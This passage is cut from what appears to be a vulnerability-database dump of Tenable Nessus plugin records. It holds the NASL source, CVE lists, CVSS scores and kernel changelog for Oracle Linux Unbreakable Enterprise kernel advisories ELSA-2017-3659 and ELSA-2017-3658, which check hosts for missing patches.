"The remote Oracle Linux host is missing a security update for\nthe Unbreakable Enterprise kernel package(s).", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2017-3659.NASL", "href": "https://www.tenable.com/plugins/nessus/105247", "published": "2017-12-14T00:00:00", 
"title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3659) (BlueBorne) (Dirty COW) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from Oracle Linux\n# Security Advisory ELSA-2017-3659.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105247);\n script_version(\"3.14\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-10318\", \"CVE-2016-1575\", \"CVE-2016-1576\", \"CVE-2016-6213\", \"CVE-2016-9191\", \"CVE-2016-9604\", \"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-1000405\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12154\", \"CVE-2017-12190\", \"CVE-2017-12192\", \"CVE-2017-14106\", \"CVE-2017-14489\", \"CVE-2017-15649\", \"CVE-2017-16527\", \"CVE-2017-16650\", \"CVE-2017-2618\", \"CVE-2017-2671\", \"CVE-2017-7477\", \"CVE-2017-7482\", \"CVE-2017-7533\", \"CVE-2017-7541\", \"CVE-2017-7542\", \"CVE-2017-7618\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8797\", \"CVE-2017-8831\", \"CVE-2017-8890\", \"CVE-2017-9059\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3659) (BlueBorne) (Dirty COW) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Oracle Linux host is missing a security update for\nthe Unbreakable Enterprise kernel package(s).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://oss.oracle.com/pipermail/el-errata/2017-December/007417.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-December/007418.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2016/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-10318\", \"CVE-2016-1575\", \"CVE-2016-1576\", \"CVE-2016-6213\", \"CVE-2016-9191\", \"CVE-2016-9604\", \"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-1000405\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12154\", \"CVE-2017-12190\", \"CVE-2017-12192\", \"CVE-2017-14106\", \"CVE-2017-14489\", \"CVE-2017-15649\", \"CVE-2017-16527\", \"CVE-2017-16650\", \"CVE-2017-2618\", \"CVE-2017-2671\", \"CVE-2017-7477\", \"CVE-2017-7482\", \"CVE-2017-7533\", \"CVE-2017-7541\", \"CVE-2017-7542\", \"CVE-2017-7618\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8797\", \"CVE-2017-8831\", \"CVE-2017-8890\", \"CVE-2017-9059\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3659\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + 
expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-112.14.1.el6uek\")) flag++;\n\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-112.14.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-112.14.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-112.14.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-112.14.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", 
reference:\"kernel-uek-doc-4.1.12-112.14.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-112.14.1.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:42:44", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[2.6.39-400.298.1.el6uek]\n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) \n [Orabug: 23320090]\n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) \n[Orabug: 24337879]\n- xen-netfront: cast grant table reference first to type int (Dongli \nZhang) [Orabug: 25102637]\n- xen-netfront: do not cast grant table reference to signed short \n(Dongli Zhang) [Orabug: 25102637]\n- RDS: Print failed rdma op details if failure is remote access error \n(Rama Nichanamatlu) [Orabug: 25440316]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540288] \n{CVE-2017-2671}\n- KEYS: fix dereferencing NULL payload with nonzero length (Eric \nBiggers) [Orabug: 26592013]\n- oracleasm: Copy the integrity descriptor (Martin K. 
Petersen) \n[Orabug: 26650039]\n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: \n26675934] {CVE-2017-7889}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797307]\n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058559]\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069045] \n{CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly \nMayatskikh) [Orabug: 27069045] {CVE-2017-12190}\n- xsigo: [backport] Fix race in freeing aged Forwarding tables (Pradeep \nGopanapalli) [Orabug: 24823234]\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 25671723]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 25671723]\n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) \n[Orabug: 26143563] {CVE-2017-7308}\n- net/packet: fix overflow in check for tp_frame_nr (Andrey Konovalov) \n[Orabug: 26143563] {CVE-2017-7308}\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403941] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403958] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben \nHutchings) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. 
\nMiller) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) \n[Orabug: 26403974] {CVE-2017-9074}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404007] {CVE-2017-9077}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643601] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. \nBiederman) [Orabug: 26643601] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643601] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643652] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650889] {CVE-2017-9075}\n- saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675148] {CVE-2017-8831}\n- saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675148] \n{CVE-2017-8831}\n- saa7164: get rid of warning: no previous prototype (Mauro Carvalho \nChehab) [Orabug: 26675148] {CVE-2017-8831}\n- [scsi] lpfc 8.3.44: Fix kernel panics from corrupted ndlp (James \nSmart) [Orabug: 26765341]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899791] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2017-3658.NASL", "href": "https://www.tenable.com/plugins/nessus/105145", "published": "2017-12-11T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3658) (BlueBorne) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3658.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105145);\n script_version(\"3.17\");\n script_cvs_date(\"Date: 2019/09/27 
13:00:38\");\n\n script_cve_id(\"CVE-2014-9710\", \"CVE-2015-1465\", \"CVE-2015-2686\", \"CVE-2015-4167\", \"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000253\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12190\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-7273\", \"CVE-2017-7308\", \"CVE-2017-7542\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8831\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3658) (BlueBorne) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.298.1.el6uek]\n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) \n [Orabug: 23320090]\n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) \n[Orabug: 24337879]\n- xen-netfront: cast grant table reference first to type int (Dongli \nZhang) [Orabug: 25102637]\n- xen-netfront: do not cast grant table reference to signed short \n(Dongli Zhang) [Orabug: 25102637]\n- RDS: Print failed rdma op details if failure is remote access error \n(Rama Nichanamatlu) [Orabug: 25440316]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540288] \n{CVE-2017-2671}\n- KEYS: fix dereferencing NULL payload with nonzero length (Eric \nBiggers) [Orabug: 26592013]\n- oracleasm: Copy the integrity descriptor (Martin K. 
Petersen) \n[Orabug: 26650039]\n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: \n26675934] {CVE-2017-7889}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797307]\n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058559]\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069045] \n{CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly \nMayatskikh) [Orabug: 27069045] {CVE-2017-12190}\n- xsigo: [backport] Fix race in freeing aged Forwarding tables (Pradeep \nGopanapalli) [Orabug: 24823234]\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 25671723]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 25671723]\n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) \n[Orabug: 26143563] {CVE-2017-7308}\n- net/packet: fix overflow in check for tp_frame_nr (Andrey Konovalov) \n[Orabug: 26143563] {CVE-2017-7308}\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403941] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403958] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben \nHutchings) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. 
\nMiller) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) \n[Orabug: 26403974] {CVE-2017-9074}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404007] {CVE-2017-9077}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643601] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. \nBiederman) [Orabug: 26643601] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643601] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643652] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650889] {CVE-2017-9075}\n- saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675148] {CVE-2017-8831}\n- saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675148] \n{CVE-2017-8831}\n- saa7164: get rid of warning: no previous prototype (Mauro Carvalho \nChehab) [Orabug: 26675148] {CVE-2017-8831}\n- [scsi] lpfc 8.3.44: Fix kernel panics from corrupted ndlp (James \nSmart) [Orabug: 26765341]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899791] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't \nparse nlmsg properly (Xin Long) [Orabug: 26988628] {CVE-2017-14489}\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: \n26643562] {CVE-2017-11176}\n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina \nDubroca) [Orabug: 27011278] {CVE-2017-7542}\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) \n[Orabug: 27002453] {CVE-2017-1000111}\n- mlx4_core: calculate log_mtt based on total system memory (Wei Lin \nGuay) [Orabug: 26867355]\n- xen/x86: Add interface for querying amount of host memory (Boris \nOstrovsky) [Orabug: 26867355]\n- fs/binfmt_elf.c: fix 
bug in loading of PIE binaries (Michael Davidson) \n [Orabug: 26870958] {CVE-2017-1000253}\n- Bluetooth: Properly check L2CAP config option output buffer length \n(Ben Seri) [Orabug: 26796428] {CVE-2017-1000251}\n- xen: fix bio vec merging (Roger Pau Monne) [Orabug: 26645562] \n{CVE-2017-12134}\n- fs/exec.c: account for argv/envp pointers (Kees Cook) [Orabug: \n26638926] {CVE-2017-1000365} {CVE-2017-1000365}\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume \nNault) [Orabug: 26586050] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz \nGuzik) [Orabug: 26586024] {CVE-2016-9685}\n- KEYS: Disallow keyrings beginning with '.' to be joined as session \nkeyrings (David Howells) [Orabug: 26586002] {CVE-2016-9604}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) \n[Orabug: 26578202] {CVE-2017-9242}\n- selinux: quiet the filesystem labeling behavior message (Paul Moore) \n[Orabug: 25721485]\n- RDS/IB: active bonding port state fix for intfs added late (Mukesh \nKacker) [Orabug: 25875426]\n- HID: hid-cypress: validate length of report (Greg Kroah-Hartman) \n[Orabug: 25891914] {CVE-2017-7273}\n- udf: Remove repeated loads blocksize (Jan Kara) [Orabug: 25905722] \n{CVE-2015-4167}\n- udf: Check length of extended attributes and allocation descriptors \n(Jan Kara) [Orabug: 25905722] {CVE-2015-4167}\n- udf: Verify i_size when loading inode (Jan Kara) [Orabug: 25905722] \n{CVE-2015-4167}\n- btrfs: drop unused parameter from btrfs_item_nr (Ross Kirk) [Orabug: \n25948102] {CVE-2014-9710}\n- Btrfs: cleanup of function where fixup_low_keys() is called (Tsutomu \nItoh) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: remove unused argument of fixup_low_keys() (Tsutomu Itoh) \n[Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: remove unused argument of btrfs_extend_item() (Tsutomu Itoh) \n[Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: add support for asserts (Josef Bacik) [Orabug: 25948102] \n{CVE-2014-9710}\n- Btrfs: 
make xattr replace operations atomic (Filipe Manana) [Orabug: \n25948102] {CVE-2014-9710}\n- net: validate the range we feed to iov_iter_init() in \nsys_sendto/sys_recvfrom (Al Viro) [Orabug: 25948149] {CVE-2015-2686}\n- xsigo: Compute node crash on FC failover (Joe Jin) [Orabug: 25965445]\n- PCI: Prevent VPD access for QLogic ISP2722 (Ethan Zhao) [Orabug: \n25975513]\n- PCI: Prevent VPD access for buggy devices (Babu Moger) [Orabug: \n25975513]\n- ipv4: try to cache dst_entries which would cause a redirect (Hannes \nFrederic Sowa) [Orabug: 26032377] {CVE-2015-1465}\n- mm: larger stack guard gap, between vmas (Hugh Dickins) [Orabug: \n26326145] {CVE-2017-1000364}\n- nfsd: check for oversized NFSv2/v3 arguments (J. Bruce Fields) \n[Orabug: 26366024] {CVE-2017-7645}\n- dm mpath: allow ioctls to trigger pg init (Mikulas Patocka) [Orabug: \n25645229]\n- xen/manage: Always freeze/thaw processes when suspend/resuming (Ross \nLagerwall) [Orabug: 25795530]\n- lpfc cannot establish connection with targets that send PRLI under P2P \nmode (Joe Jin) [Orabug: 25955028]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-December/007409.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", 
value:'AF_PACKET packet_set_ring Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
